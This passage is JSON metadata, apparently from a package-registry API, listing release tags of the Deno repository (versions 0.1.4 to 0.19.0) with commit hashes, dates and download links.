positories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2F